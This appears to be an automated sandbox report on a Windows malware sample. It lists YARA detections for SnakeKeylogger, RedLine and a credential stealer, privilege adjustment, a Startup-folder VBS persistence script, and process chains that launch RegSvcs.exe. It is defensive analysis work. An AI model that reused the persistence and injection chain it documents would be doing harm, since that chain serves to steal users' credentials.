Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD6158	3_2_05FD6158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD3151	3_2_05FD3151
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDDD40	3_2_05FDDD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDDD30	3_2_05FDDD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD5D10	3_2_05FD5D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD5D00	3_2_05FD5D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDD8E8	3_2_05FDD8E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDD8D8	3_2_05FDD8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDD490	3_2_05FDD490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDD480	3_2_05FDD480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD0040	3_2_05FD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD0006	3_2_05FD0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDF750	3_2_05FDF750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDF749	3_2_05FDF749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD4709	3_2_05FD4709
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDF2F8	3_2_05FDF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDF2E8	3_2_05FDF2E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD72C8	3_2_05FD72C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDCEC0	3_2_05FDCEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD42C0	3_2_05FD42C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD72B8	3_2_05FD72B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD42B0	3_2_05FD42B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDEEA0	3_2_05FDEEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDEE90	3_2_05FDEE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD6E70	3_2_05FD6E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD3E68	3_2_05FD3E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD6E61	3_2_05FD6E61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD3E58	3_2_05FD3E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDEA48	3_2_05FDEA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FDEA39	3_2_05FDEA39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD6A18	3_2_05FD6A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD3A10	3_2_05FD3A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_05FD6A08	3_2_05FD6A08
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 5_2_01ADB6A8	5_2_01ADB6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_014C11A8	6_2_014C11A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_014C1448	6_2_014C1448

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: String function: 01000AE3 appears 70 times
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: String function: 00FE7DE1 appears 35 times
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: String function: 01008900 appears 42 times
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: String function: 00640AE3 appears 70 times
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: String function: 00627DE1 appears 36 times
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: String function: 00648900 appears 42 times

Source: yqfze5TKW7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.RegSvcs.exe.27d0ee8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.porcelainization.exe.3580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.27d0ee8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.27d0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.porcelainization.exe.18e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.27d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1530661018.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1650477461.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0068A06A GetLastError,FormatMessageW,

0_2_0068A06A

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006781CB AdjustTokenPrivileges,CloseHandle,	0_2_006781CB
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_006787E1
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010381CB AdjustTokenPrivileges,CloseHandle,	2_2_010381CB
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_010387E1

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0068B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0068B333

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0069EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0069EE0D

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_006983BB

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00624E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00624E89

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

File created: C:\Users\user\AppData\Local\underbalance

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

File created: C:\Users\user\AppData\Local\Temp\autEEF2.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs"

Source: yqfze5TKW7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.2747027909.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2747027909.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2747027909.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2747027909.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2747027909.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2748823717.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: yqfze5TKW7.exe	Virustotal: Detection: 48%
Source: yqfze5TKW7.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

File read: C:\Users\user\Desktop\yqfze5TKW7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yqfze5TKW7.exe "C:\Users\user\Desktop\yqfze5TKW7.exe"
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Process created: C:\Users\user\AppData\Local\underbalance\porcelainization.exe "C:\Users\user\Desktop\yqfze5TKW7.exe"
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\yqfze5TKW7.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\underbalance\porcelainization.exe "C:\Users\user\AppData\Local\underbalance\porcelainization.exe"
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\underbalance\porcelainization.exe"
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Process created: C:\Users\user\AppData\Local\underbalance\porcelainization.exe "C:\Users\user\Desktop\yqfze5TKW7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\yqfze5TKW7.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\underbalance\porcelainization.exe "C:\Users\user\AppData\Local\underbalance\porcelainization.exe"	Jump to behavior
